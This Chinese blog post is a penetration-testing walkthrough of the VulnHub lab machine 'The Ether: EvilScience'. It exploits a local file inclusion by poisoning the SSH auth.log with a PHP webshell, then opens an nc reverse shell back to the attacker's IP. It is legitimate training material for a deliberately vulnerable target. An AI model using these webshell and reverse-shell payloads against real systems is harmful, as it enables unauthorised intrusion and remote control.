Vulnhub靶机 The Ether: EvilScience (v1.0.1)(渗透测试详解)

于 2024-08-03 15:32:10 发布
阅读量170 收藏 4
点赞数 7
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78721909/article/details/140888563
版权

一、靶机配置

1、靶机下载地址
https://download.vulnhub.com/theether/theEther_1.0.1.zip
2、靶机默认为桥接改为net

二、Web渗透测试

1、靶机IP扫描

2、进行靶机端口服务扫描
nmap -sV -p- -A -Pn 192.168.31.141

3、对靶机进行目录扫描

4、访问靶机IP

查看页面功能点,发现一个很可能存在文件包含的点

4、利用burp批量测试存在什么文件包含

github路径地址(LFI-Jhaddix.txt)

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

下载完成

利用burl抓包

发送到intruder模块,利用下载的路径进行爆破

发现结果有几条不一样,拼接访问

拼接/var/log/lastlog,可以访问但是没什么用

/var/log/auth.log 重定向回了首页(注意这个URL)

查看/var/log/auth.log时重定向回首页,说明应该隐藏了什么东西,我们抓包查看一下响应数据包

确实存在

4、SSHgetshell

auth.log文件是我们尝试连接服务器时生成日志。那么就可以利用这个功能,发送恶意PHP代码将恶意代码作为新日志自动添加到auth.log文件中。先看一下phpinfo是否能成功利用

ssh '<?php phpinfo();?>'@192.168.31.142

既然ssh的操作可以被记录到日志中,那么可以尝试是否能够通过日志注入+文件包含来执行任意命令尝试注入一段php代码

1、先写入php一句话木马:
	ssh '<?php system($_GET[cmd]);?>'@192.168.1.13(不能用双引号,并且?php中间不能有空格)

2、执行webshell
	curl -is 'http://192.168.1.13/index.php?file=/var/log/auth.log&cmd=ls'

既然可以执行任意命令,我们尝试一下反弹一个持久化的shell,NC不能使用-e选项时使用以下反弹语句:

curl -is 'http://192.168.31.142/index.php?file=/var/log/auth.log&cmd=mknod+backpipe+p+%26%26+nc+192.168.1.7+9999+0%3Cbackpipe+%7C+%2Fbin%2Fbash+1%3Ebackpipe'
注意:这里需要进行下url编码,不然会报错

成功反弹

芜丶湖
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2664
迟到的文章,就当库存发出来吧~
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
我是小小白的博客
07-09 544
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 靶机难度:中级(CTF) 靶机发布日期:2017 年 10 月 30 日 靶机描述:最近,我一直喜欢为安全社区创造黑客挑战。这一新挑战囊括了一家名为 The Ether 的公司,该公司宣布了一种显着改变人类福利的灵丹妙药。由于他们正在开发的产品的性质,CDC 对这个群体产生了怀疑。 目标:
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1081
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE
shinygod的博客
02-19 601
本地文件包含:利用 ssh 登录产生错误日志写入一句话木马(ssh ''@ip)seclists 字典:https://github.com/danielmiessler/SecListssudo -l。
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1108
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4316
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
[Vulnhub靶机] DriftingBlues: 5
haosha。的博客
02-13 1959
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:1.0.1
Aluxian_的博客
09-17 358
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Grotesque系列一共有3个靶机,分别是1.2.3老样子需要获得root权限找到flagmedium1.信息收集工具的使用2.md5sum工具的使用(这个确实我没想到!我对不上那个密码)3.和john破解密码4.了解.kdbx文件Keepass文件的解密Grotesque。
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1198
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
互联网架构小马的博客
07-31 563
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全和安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
最新发布
Lusen的博客
08-02 473
Vulnhub系列Connect-The-Dots靶场做题记录
计算机网络—电路、分组、报文交换—图文详解
喻师傅的学习笔记
07-31 777
计算机网络—三种交换方式图文详解
linux操作系统_TCP
hkhkhkhkh123的博客
07-30 1078
1)三次握手和四次挥手机制 2) 确认应答:TCP将每个字节的数据都进行了编号,即为序列号。每一个ACK都带有对应的确认序列号,保证数据不丢失的按序到达 3)超时重传:当发送端发送的数据在网络中丢失时,在一定时间内没有收到接收端的ACK,则发送端会重新发送丢失数据。2. ACK: 确认应答标志 3. PSH: 表示发送数据,提示接收端从TCP接收缓冲区中读走数据,为接收后续数据腾出空间 4. RST: 重置连接标志 5. SYN: 表示请求建立一个连接 6. FIN: finish标志, 表示释放连接。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值